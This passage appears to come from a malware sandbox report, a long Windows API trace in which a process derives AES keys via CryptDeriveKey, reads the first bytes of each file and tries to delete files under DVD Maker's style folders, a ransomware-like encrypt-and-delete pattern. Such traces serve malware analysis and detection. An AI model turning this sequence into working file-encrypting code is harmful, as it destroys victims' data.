phHash=0x326a4d0) returned 1 [0141.758] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0141.758] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0141.758] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8df12 [0141.759] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0141.793] CryptDestroyHash (hHash=0x284d528) returned 1 [0141.793] CryptDestroyKey (hKey=0x284d568) returned 1 [0141.793] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0141.795] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\content-background.png")) returned 0 [0141.830] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0141.831] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0141.831] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0141.831] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0141.831] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc2f0 [0141.831] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0141.836] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0141.836] CryptDestroyKey (hKey=0x284d568) returned 1 [0141.836] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0141.837] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\content-foreground.png")) returned 0 [0141.837] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0141.838] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0141.838] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0141.838] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0141.838] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb8c4 [0141.838] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0141.843] CryptDestroyHash (hHash=0x284d528) returned 1 [0141.843] CryptDestroyKey (hKey=0x284d568) returned 1 [0141.843] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0141.844] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\curtains.png")) returned 0 [0141.845] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0141.846] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0141.846] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0141.846] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0141.846] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x12d98 [0141.846] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0141.852] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0141.852] CryptDestroyKey (hKey=0x284d568) returned 1 [0141.852] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0141.853] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_precomp_matte.wmv")) returned 0 [0141.853] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0141.854] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0141.854] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0141.854] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0141.854] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x14cd8 [0141.854] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0141.860] CryptDestroyHash (hHash=0x284d528) returned 1 [0141.860] CryptDestroyKey (hKey=0x284d568) returned 1 [0141.860] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0141.862] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_PreComp_MATTE_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_precomp_matte_pal.wmv")) returned 0 [0141.871] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0141.872] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0141.872] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0141.872] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0141.872] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x26618 [0141.872] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0141.919] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0141.919] CryptDestroyKey (hKey=0x284d568) returned 1 [0141.919] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0141.921] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_matte.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_matte.wmv")) returned 0 [0141.955] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0141.955] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0141.955] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0141.955] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0141.956] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x28558 [0141.956] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0141.966] CryptDestroyHash (hHash=0x284d528) returned 1 [0141.966] CryptDestroyKey (hKey=0x284d568) returned 1 [0141.966] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0141.967] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_MATTE_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_matte_pal.wmv")) returned 0 [0141.968] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0141.969] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0141.969] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0141.969] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0141.969] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2e31e [0141.969] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0141.980] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0141.980] CryptDestroyKey (hKey=0x284d568) returned 1 [0141.980] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0141.981] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_rgb.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_rgb.wmv")) returned 0 [0141.982] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0141.982] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0141.982] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0141.982] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0141.982] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x39e98 [0141.982] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.032] CryptDestroyHash (hHash=0x284d528) returned 1 [0142.032] CryptDestroyKey (hKey=0x284d568) returned 1 [0142.032] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.035] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_rgb_pal.wmv")) returned 0 [0142.035] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.036] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.036] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.036] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0142.036] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x609 [0142.036] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.038] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0142.038] CryptDestroyKey (hKey=0x284d568) returned 1 [0142.038] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.041] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\highlight.png")) returned 0 [0142.041] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.041] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.041] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.042] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0142.042] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x239b [0142.042] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.045] CryptDestroyHash (hHash=0x284d528) returned 1 [0142.045] CryptDestroyKey (hKey=0x284d568) returned 1 [0142.045] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.046] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\mainimage-mask.png")) returned 0 [0142.047] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.047] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.047] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.048] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0142.048] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x559 [0142.048] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.050] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0142.050] CryptDestroyKey (hKey=0x284d568) returned 1 [0142.050] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.051] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\notes-static.png")) returned 0 [0142.051] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.052] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.052] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.052] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0142.052] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x505 [0142.052] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.054] CryptDestroyHash (hHash=0x284d528) returned 1 [0142.054] CryptDestroyKey (hKey=0x284d568) returned 1 [0142.054] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.055] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\play-static.png")) returned 0 [0142.158] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0142.159] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0142.159] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.159] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0142.159] GetFileSize (in: hFile=0x424, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1276 [0142.159] ReadFile (in: hFile=0x424, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0142.161] CryptDestroyHash (hHash=0x284d668) returned 1 [0142.161] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0142.161] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0142.163] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\blackrectangle.bmp")) returned 0 [0142.173] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0142.174] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0142.174] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.174] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0142.174] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6a91 [0142.174] ReadFile (in: hFile=0x42c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0142.186] CryptDestroyHash (hHash=0x284d568) returned 1 [0142.186] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0142.186] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0142.187] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_glass.png")) returned 0 [0142.188] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0142.189] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0142.189] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.189] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0142.189] GetFileSize (in: hFile=0x424, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf26 [0142.189] ReadFile (in: hFile=0x424, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0142.207] CryptDestroyHash (hHash=0x284d668) returned 1 [0142.207] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0142.207] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0142.209] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_selectionsubpicture.png")) returned 0 [0142.209] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0142.210] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0142.210] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.210] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0142.210] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13c3 [0142.210] ReadFile (in: hFile=0x42c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0142.212] CryptDestroyHash (hHash=0x284d568) returned 1 [0142.212] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0142.212] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0142.214] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_videoinset.png")) returned 0 [0142.214] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0142.215] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0142.215] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.215] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0142.215] GetFileSize (in: hFile=0x424, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6a91 [0142.215] ReadFile (in: hFile=0x424, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0142.218] CryptDestroyHash (hHash=0x284d668) returned 1 [0142.218] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0142.218] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0142.220] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_buttongraphic.png")) returned 0 [0142.220] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0142.221] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0142.221] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.221] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0142.221] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13d0 [0142.221] ReadFile (in: hFile=0x42c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0142.224] CryptDestroyHash (hHash=0x284d568) returned 1 [0142.224] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0142.224] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0142.225] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circle_glass_Thumbnail.bmp" (normalized: "c:\\program files\\dvd 